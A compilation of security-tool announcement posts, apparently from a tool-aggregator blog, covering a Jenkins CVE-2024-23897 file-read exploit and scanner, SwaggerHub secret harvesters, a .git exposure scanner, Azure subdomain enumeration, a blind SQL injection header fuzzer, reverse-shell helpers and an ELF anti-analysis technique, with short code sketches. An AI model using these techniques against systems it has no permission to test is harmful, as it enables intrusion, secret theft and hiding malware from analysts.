
CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner

By: Zion3R


Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.


Usage

Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.

python CVE-2024-23897.py -t <target> -p <port> -f <file>

or

python CVE-2024-23897.py -i <input_file> -f <file>

Parameters:
  • -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.
  • -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line).
  • -o or --output-file: Export results to file (optional).
  • -p or --port: Specify the port number. Default is 8080 (optional).
  • -f or --file: Specify the file to read on the target system.
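
For context on what the scanning side of such a tool checks, here is a minimal, hedged sketch (not the tool's actual code): Jenkins advertises its version in the X-Jenkins response header, which can be compared against the patched versions. The function name is illustrative and the version comparison is simplified.

import requests

def looks_vulnerable(host: str, port: int = 8080) -> bool:
    # Jenkins reports its version in the X-Jenkins response header
    r = requests.get(f"http://{host}:{port}/login", timeout=5)
    version = r.headers.get("X-Jenkins", "")
    if not version:
        return False  # not Jenkins, or the header is suppressed
    major, minor = (int(x) for x in version.split(".")[:2])
    # Affected: weekly releases <= 2.441; the LTS cutoff (2.426.2) would
    # also need the third version component, omitted here for brevity
    return (major, minor) < (2, 442)

print(looks_vulnerable("127.0.0.1"))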


Changelog

[27th January 2024] - Feature Request
  • Added scanning/exploiting via input file with hosts (-i INPUT_FILE).
  • Added export to file (-o OUTPUT_FILE).

[26th January 2024] - Initial Release
  • Initial release.

Contributing

Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


Author

Alexander Hagenah - URL - Twitter


Disclaimer

This tool is meant for educational and professional purposes only. Unauthorized scanning and exploiting of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.



swaggerHole - A Python3 Script Searching For Secret On Swaggerhub

By: Zion3R


Introduction

This tool is made to automate the process of retrieving secrets in the public APIs on swaggerHub (https://app.swaggerhub.com/search). This tool is multithreaded, and pipe mode is available :)

Requirements

  • python3 (sudo apt install python3)
  • pip3 (sudo apt install python3-pip)

Installation

pip3 install swaggerhole

or clone this repository and run
git clone https://github.com/Liodeus/swaggerHole.git
pip3 install .

Usage

[swaggerHole ASCII-art banner]

usage: swaggerhole [-h] [-s SEARCH] [-o OUT] [-t THREADS] [-j] [-q] [-du] [-de]

optional arguments:
  -h, --help            show this help message and exit
  -s SEARCH, --search SEARCH
                        Term to search
  -o OUT, --out OUT     Output directory
  -t THREADS, --threads THREADS
                        Threads number (Default 25)
  -j, --json            Json output
  -q, --quiet           Remove banner
  -du, --deactivate_url
                        Deactivate the URL filtering
  -de, --deactivate_email
                        Deactivate the email filtering

Search for secrets related to a domain

swaggerHole -s test.com

echo test.com | swaggerHole

Search for secrets related to a domain and output as JSON

swaggerHole -s test.com --json

echo test.com | swaggerHole --json

Search for secrets related to a domain, and do it fast :)

swaggerHole -s test.com -t 100

echo test.com | swaggerHole -t 100

Output explanation

Normal output

`Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]`

Json output

`{"Finding_Type": Finding, "File": File_path, "Date": Date_Last_Update, "Line": Number}`

Deactivate URL/email filtering

Using -du or -de removes the filtering done by the tool. Expect more false positives with these options.
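
For the curious, the underlying idea can be sketched roughly as follows: query SwaggerHub's public registry for specs matching the search term, then grep each returned document for key-like strings. The endpoint layout and the regex are assumptions for illustration, not swaggerHole's exact implementation.

import re
import requests

SEARCH = "https://api.swaggerhub.com/specs"  # assumed public registry endpoint
KEY_RE = re.compile(r"(?i)(api[_-]?key|secret|password|token)\s*[:=]\s*\S+")

def scan(term: str):
    page = requests.get(SEARCH, params={"query": term, "limit": 50}, timeout=10).json()
    for api in page.get("apis", []):
        # Each search result advertises a URL to the raw Swagger/OpenAPI document
        spec_url = next((p["url"] for p in api.get("properties", []) if "url" in p), None)
        if not spec_url:
            continue
        body = requests.get(spec_url, timeout=10).text
        for lineno, line in enumerate(body.splitlines(), 1):
            if KEY_RE.search(line):
                print(f"{spec_url} [Line:{lineno}] {line.strip()}")

scan("test.com")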

RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains

By: Zion3R


RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.


Features
  • Automated scanning of domains and subdomains for exposed .git repositories.
  • Streamlines the detection of sensitive data exposures.
  • User-friendly command-line interface.
  • Ideal for security audits and Bug Bounty.

Installation

Clone the repository and install the required dependencies:

git clone https://github.com/YourUsername/RepoReaper.git
cd RepoReaper
pip install -r requirements.txt
chmod +x RepoReaper.py

Usage

RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.

To start RepoReaper, simply run:

./RepoReaper.py
or
python3 RepoReaper.py

Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains:

Enter the path of the file containing domains

Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:

example.com
subdomain.example.com
anotherdomain.com

RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.
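
The core check is simple enough to sketch: an exposed repository typically serves .git/HEAD with a "ref:" line. A minimal, hedged approximation (not RepoReaper's actual code) looks like this:

import requests

def git_exposed(domain: str) -> bool:
    # An exposed repo serves .git/HEAD, whose content starts with "ref:"
    for scheme in ("https", "http"):
        try:
            r = requests.get(f"{scheme}://{domain}/.git/HEAD", timeout=5)
            if r.status_code == 200 and r.text.startswith("ref:"):
                return True
        except requests.RequestException:
            continue
    return False

with open("domains.txt") as fh:  # one domain or subdomain per line, as above
    for domain in (line.strip() for line in fh if line.strip()):
        if git_exposed(domain):
            print(f"[+] Exposed .git repository: {domain}")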


Disclaimer

This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.



SploitScan - A Sophisticated Cybersecurity Utility Designed To Provide Detailed Information On Vulnerabilities And Associated Proof-Of-Concept (PoC) Exploits

By: Zion3R


SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. It empowers cybersecurity professionals to swiftly identify, test, and apply known exploits, and it's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.


Features
  • CVE Information Retrieval: Fetches CVE details from the National Vulnerability Database.
  • EPSS Integration: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization.
  • PoC Exploits Aggregation: Gathers publicly available PoC exploits, enhancing the understanding of vulnerabilities.
  • CISA KEV: Shows if the CVE has been listed in the Known Exploited Vulnerabilities (KEV) of CISA.
  • Patching Priority System: Evaluates and assigns a priority rating for patching based on various factors including public exploits availability.
  • Multi-CVE Support and Export Options: Supports multiple CVEs in a single run and allows exporting the results to JSON and CSV formats.
  • User-Friendly Interface: Easy to use, providing clear and concise information.
  • Comprehensive Security Tool: Ideal for quick security assessments and staying informed about recent vulnerabilities.

Usage

Regular:

python sploitscan.py CVE-YYYY-NNNNN

Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.

python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN

Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.

python sploitscan.py CVE-YYYY-NNNNN -e JSON

Patching Prioritization System

The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:

  • A+ Priority: Assigned to CVEs listed in CISA's KEV or those with publicly available exploits. This reflects the highest risk and urgency for patching.
  • A to D Priority: Based on a combination of CVSS scores and EPSS probability percentages. The decision matrix is as follows:
  • A: CVSS score >= 6.0 and EPSS score >= 0.2. High severity with a significant probability of exploitation.
  • B: CVSS score >= 6.0 but EPSS score < 0.2. High severity but lower probability of exploitation.
  • C: CVSS score < 6.0 and EPSS score >= 0.2. Lower severity but higher probability of exploitation.
  • D: CVSS score < 6.0 and EPSS score < 0.2. Lower severity and lower probability of exploitation.

This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be adjusted to suit your business needs.
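
The decision matrix above translates directly into code. A minimal sketch of the documented logic (the function name and argument shapes are illustrative, not SploitScan's internals):

def patching_priority(cvss: float, epss: float, in_kev: bool, public_poc: bool) -> str:
    # A+ overrides the matrix: KEV-listed or public exploit available
    if in_kev or public_poc:
        return "A+"
    if cvss >= 6.0:
        return "A" if epss >= 0.2 else "B"
    return "C" if epss >= 0.2 else "D"

assert patching_priority(8.8, 0.5, in_kev=False, public_poc=False) == "A"
assert patching_priority(5.0, 0.05, in_kev=False, public_poc=False) == "D"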


Changelog

[17th February 2024] - Enhancement Update
  • Additional Information: Added further information such as references & vector string
  • Removed: Star count in publicly available exploits

[15th January 2024] - Enhancement Update
  • Multiple CVE Support: Now capable of handling multiple CVE IDs in a single execution.
  • JSON and CSV Export: Added functionality to export results to JSON and CSV files.
  • Enhanced CVE Display: Improved visual differentiation and information layout for each CVE.
  • Patching Priority System: Introduced a priority rating system for patching, influenced by various factors including the availability of public exploits.

[13th January 2024] - Initial Release
  • Initial release of SploitScan.

Contributing

Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


Author

Alexander Hagenah - URL - Twitter


Credits


SpeedyTest - Command-Line Tool For Measuring Internet Speed

By: Zion3R


SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.


Features
  • Measure download speed, upload speed, and ping latency.
  • Generate detailed reports with graphical representation of speed test results.
  • Save and export test results in various formats (CSV, JSON, etc.).
  • Customize speed test parameters and server selection.
  • Compare speed test results over time to track performance changes.
  • Integrate SpeedyTest into your own applications using the provided API.
  • Track your speed history with a saved database.

Installation
git clone https://github.com/HalilDeniz/SpeedyTest.git

Requirements

Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:

pip install -r requirements.txt

Usage

Run the following command to perform a speed test:

python3 speendytest.py
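
SpeedyTest's internals are not shown here, but for a sense of what such a measurement involves, here is a minimal sketch using the third-party speedtest-cli library (an assumption for illustration, not SpeedyTest's own code):

import speedtest  # pip install speedtest-cli

st = speedtest.Speedtest()
st.get_best_server()              # pick the lowest-latency server
down = st.download() / 1_000_000  # bits/s -> Mbps
up = st.upload() / 1_000_000
print(f"Server  : {st.results.server['sponsor']} - {st.results.server['name']}")
print(f"Ping    : {st.results.ping:.2f} ms")
print(f"Download: {down:.2f} Mbps")
print(f"Upload  : {up:.2f} Mbps")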

Visual Output



Output
Receiving data \
Speed test completed!
Speed test time: 20.22 second
Server : Farknet - Konya
IP Address: speedtest.farknet.com.tr:8080
Country : Turkey
City : Konya
Ping : 20.41 ms
Download : 90.12 Mbps
Loading : 20 Mbps

Contributing

Contributions are welcome! To contribute to SpeedyTest, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about SpeedyTest, please feel free to contact me:


License

SpeedyTest is released under the MIT License. See LICENSE for details.



SwaggerSpy - Automated OSINT On SwaggerHub

By: Zion3R


SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.


What is Swagger?

Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.


About SwaggerHub

SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.


Why OSINT on SwaggerHub?

Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:

  1. Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.

  2. Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.

  3. Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.

  4. Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.

  5. Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.

  6. Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.

By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.


How SwaggerSpy Works

SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.
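
As a sketch of that idea, the patterns below show the kind of regular expressions such a scan applies to a fetched API document; they are illustrative examples, not SwaggerSpy's actual rule set.

import re

PATTERNS = {
    "AWS Access Key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Google API Key": re.compile(r"AIza[0-9A-Za-z_\-]{35}"),
    "Bearer Token":   re.compile(r"(?i)authorization:\s*bearer\s+[A-Za-z0-9._\-]+"),
    "Generic Secret": re.compile(r"(?i)(secret|passwd|password)\s*[:=]\s*['\"]?\S+"),
}

def inspect(document: str):
    for name, pattern in PATTERNS.items():
        for match in pattern.finditer(document):
            print(f"[{name}] {match.group(0)}")

inspect('{"info": {"description": "password: hunter2"}}')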


Getting Started

To use SwaggerSpy, follow these steps:

  1. Installation: Clone the SwaggerSpy repository and install the required dependencies.
git clone https://github.com/UndeadSec/SwaggerSpy.git
cd SwaggerSpy
pip install -r requirements.txt
  2. Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
python swaggerspy.py searchterm
  3. Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.

Disclaimer

SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.


Contribution

Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.


About the Author

SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)

I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.


TODO

Regular Expressions Enhancement
  • [ ] Review and improve existing regular expressions.
  • [ ] Ensure that regular expressions adhere to best practices.
  • [ ] Check for any potential optimizations in the regex patterns.
  • [ ] Test regular expressions with various input scenarios for accuracy.
  • [ ] Document any complex or non-trivial regex patterns for better understanding.
  • [ ] Explore opportunities to modularize or break down complex patterns.
  • [ ] Verify the regular expressions against the latest specifications or requirements.
  • [ ] Update documentation to reflect any changes made to the regular expressions.

License

SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.


Thanks

Special thanks to @Liodeus for providing project inspiration through swaggerHole.



AzSubEnum - Azure Service Subdomain Enumeration

By: Zion3R


AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.


How does it work?

AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
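
The approach can be sketched compactly: append well-known Azure service suffixes to the base name (plus permutations) and keep whatever resolves. The suffix list below is a known subset, and the code is illustrative, not AzSubEnum's implementation.

import socket

AZURE_SUFFIXES = {
    "App Services":       "azurewebsites.net",
    "Storage Accounts":   "blob.core.windows.net",
    "MSSQL":              "database.windows.net",
    "Cosmos DB":          "documents.azure.com",
    "Redis":              "redis.cache.windows.net",
    "Key Vaults":         "vault.azure.net",
    "Container Registry": "azurecr.io",
    "CDN":                "azureedge.net",
}

def enumerate_base(base: str, permutations=("", "dev", "prod", "test")):
    for service, suffix in AZURE_SUFFIXES.items():
        for perm in permutations:
            name = f"{base}{perm}.{suffix}"
            try:
                socket.gethostbyname(name)  # resolves -> the subdomain exists
                print(f"[+] {service}: {name}")
            except socket.gaierror:
                pass

enumerate_base("retailcorp")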


Why did I create this?

During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on PowerShell under Debian. Consequently, I created a crude implementation of that tool in Python.


Usage
➜  AzSubEnum git:(main) ✗ python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

Azure Subdomain Enumeration

options:
  -h, --help            show this help message and exit
  -b BASE, --base BASE  Base name to use
  -v, --verbose         Show verbose output
  -t THREADS, --threads THREADS
                        Number of threads for concurrent execution
  -p PERMUTATIONS, --permutations PERMUTATIONS
                        File containing permutations

Basic enumeration:

python3 azsubenum.py -b retailcorp --threads 10

Using permutation wordlists:

python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt

With verbose output:

python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt --verbose




MrHandler - Linux Incident Response Reporting

By: Zion3R



MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.
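
The collection step is straightforward to sketch with paramiko; the command list and report shape below are illustrative, not MR.Handler's actual implementation.

import paramiko

COMMANDS = {
    "Network configuration": "ip a",
    "Logged-in users":       "who",
    "Running processes":     "ps aux",
    "Recent auth log":       "tail -n 50 /var/log/auth.log",
}

def collect(host: str, user: str, password: str) -> str:
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(host, username=user, password=password)
    sections = []
    for title, cmd in COMMANDS.items():
        _, stdout, _ = client.exec_command(cmd)
        sections.append(f"<h2>{title}</h2><pre>{stdout.read().decode()}</pre>")
    client.close()
    return "<html><body>" + "".join(sections) + "</body></html>"

open("report.html", "w").write(collect("10.0.0.5", "root", "password"))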



π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
$ pip3 install colorama
$ pip3 install paramiko
$ git clone https://github.com/emrekybs/BlueFish.git
$ cd MrHandler
$ chmod +x MrHandler.py
$ python3 MrHandler.py


Report



NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes

By: Zion3R


NullSection is an Anti-Reversing tool that applies a technique that overwrites the section header with nullbytes.


Install
git clone https://github.com/MatheuZSecurity/NullSection
cd NullSection
gcc nullsection.c -o nullsection
./nullsection

Advantage

When you run nullsection on any ELF binary (it could even be a .ko rootkit), and you then use Ghidra or IDA to parse the ELF, no functions will appear in the decompiler. Even running readelf -S /path/to/elf will produce the message "There are no sections in this file."
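
The same technique can be sketched in Python for a 64-bit ELF: zero out the section header table, then clear the header fields that point at it. This is an illustration of the idea; the tool itself is written in C.

import struct, sys

def null_sections(path: str):
    data = bytearray(open(path, "rb").read())
    assert data[:4] == b"\x7fELF" and data[4] == 2, "64-bit ELF expected"
    e_shoff, = struct.unpack_from("<Q", data, 0x28)  # section header table offset
    e_shentsize, e_shnum = struct.unpack_from("<HH", data, 0x3A)
    # Overwrite the section header table with null bytes
    data[e_shoff:e_shoff + e_shentsize * e_shnum] = bytes(e_shentsize * e_shnum)
    # Clear e_shoff, e_shentsize, e_shnum and e_shstrndx in the ELF header
    struct.pack_into("<Q", data, 0x28, 0)
    struct.pack_into("<HHH", data, 0x3A, 0, 0, 0)
    open(path, "wb").write(bytes(data))

null_sections(sys.argv[1])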

Make good use of the tool!


Note
We are not responsible for any damage caused by this tool; use it intelligently and for educational purposes only.


WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R


WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.


Done
  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

Installation

From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

From Dockerfile

You can run this application in a container after building it from the Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

From DockerHub

You can run this application in a container after pulling it from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

Usage
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS]
                      Input multiple or single targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY
                      Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT
                      Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT
                      Print outputs to the terminal screen.
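
The static-file scan boils down to harvesting candidate words from fetched pages. A minimal, hedged sketch of that idea (not the tool's actual code):

import re
import requests

def build_wordlist(url: str, min_len: int = 4):
    html = requests.get(url, timeout=10).text
    # Harvest identifier-like words from the raw HTML and deduplicate them
    words = set(re.findall(rf"[A-Za-z][A-Za-z0-9_\-]{{{min_len - 1},}}", html))
    return sorted(words, key=str.lower)

for word in build_wordlist("https://target-web.com"):
    print(word)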



Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R

Essential utilities for pentesters, bug-bounty hunters, and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters, and security researchers that covers the most common and tedious tasks performed during cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists, and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!


Features
  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

Usage
secbutler -h

This will display the help for the tool

[secbutler ASCII-art banner]

v0.1.9 - https://github.com/groundsec/secbutler

Essential utilities for pentester, bug-bounty hunters and security researchers

Usage:
secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

Flags:
-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.



Installation

Run the following command to install the latest version:

go install github.com/groundsec/secbutler@latest

Or you can simply grab an executable from the Releases page.


License

secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.



SqliSniper - Advanced Time-based Blind SQL Injection Fuzzer For HTTP Headers

By: Zion3R


SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threading, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminate false positives through response-time analysis and to send alerts upon detection via its built-in Discord notification functionality.


Key Features

  • Time-Based Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers.
  • Multi-Threaded Scanning: Offers faster scanning capabilities through concurrent processing.
  • Discord Notifications: Sends alerts via Discord webhook for detected vulnerabilities.
  • False Positive Checks: Implements response time analysis to differentiate between true positives and false alarms.
  • Custom Payload and Headers Support: Allows users to define custom payloads and headers for targeted scanning.

Installation

git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt

Usage

This will display help for the tool. Here are all the options it supports.

ubuntu:~/sqlisniper$ ./sqlisniper.py -h


β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–„β–„ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘
β•šβ•β•β•β•β•β•β• β•šβ•β•β–€β–€β•β• β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β•β•β•β•šβ•β•β•šβ•β• β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β•

-: By Muhammad Danial :-

usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
                     [--threads THREADS]

Detect SQL injection by sending malicious queries

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Single URL for the target
  -r URLS_FILE, --urls_file URLS_FILE
                        File containing a list of URLs
  -p, --pipeline        Read from pipeline
  --proxy PROXY         Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
  --payload PAYLOAD     File containing malicious payloads (default is payloads.txt)
  --single-payload SINGLE_PAYLOAD
                        Single payload for testing
  --discord DISCORD     Discord Webhook URL
  --headers HEADERS     File containing headers (default is headers.txt)
  --threads THREADS     Number of threads

Running SqliSniper

Single URL Scan

The URL can be provided with the -u flag for a single-site scan

./sqlisniper.py -u http://example.com

File Input

The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.

./sqlisniper.py -r url.txt

Piping URLs

SqliSniper can also work with pipeline input via the -p flag

cat url.txt | ./sqlisniper.py -p

